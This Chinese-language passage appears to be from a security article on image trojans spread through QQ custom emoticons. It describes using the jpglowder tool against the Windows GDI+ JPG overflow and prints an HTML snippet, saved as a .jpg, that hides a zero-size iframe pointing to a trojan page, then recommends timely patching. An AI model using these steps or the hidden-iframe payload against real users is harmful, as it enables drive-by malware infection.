下面就以“Windows GDI+ JPG解析组件缓冲区溢出漏洞”为例,为大家讲解图片木马的生成过程。
在命令提示符下激活漏洞利用工具jpglowder,查看工具的使用方法(如图2)。漏洞利用工具包含了多个命令参数。
要利用这个漏洞生成图片木马,只要使用工具内置参数“d”即可,通过输入一段含有木马的网页链接,就可以生成需要的图片木马。
2.利用HTML代码种植木马
这种利用HTML代码制作的图片木马,其实就是传统的网页木马的一种变种而已。打开记事本程序输入如下代码,并将代码另存为plmm.jpg。
<html><body>
<iframe src="网页木马地址" width="0" height="0" frameborder="0"></iframe>
<center><img src="真实的图片地址"></img></center>
</body></html>
这里通过一个跳转命令连链到一个网页木马的地址。
定点防范,找准关键
其实,通过图片进行木马传播已经是个老技术了。但是现在黑客通过QQ的自定义表情来主动种植木马还是要引起我们的高度重视。
我们可以看到,图片木马和网页木马一样,要利用系统的漏洞才能被种植进系统,所以我们可以发现,方俊朋友在安装了各种杀毒软件和防火墙后,没有及时打上系统漏洞补丁,才让黑客有可乘之机。
所以我们防范通过QQ自定义表情来种植木马的关键就是及时为系统打上漏洞补丁(大家可以根据自己系统情况到http://www.microsoft.com下载相应补丁包),即使是不能在第一时间安装系统的安全补丁,也可以通过使用第三方提供的补丁进行防范。
关注此文的读者还看过: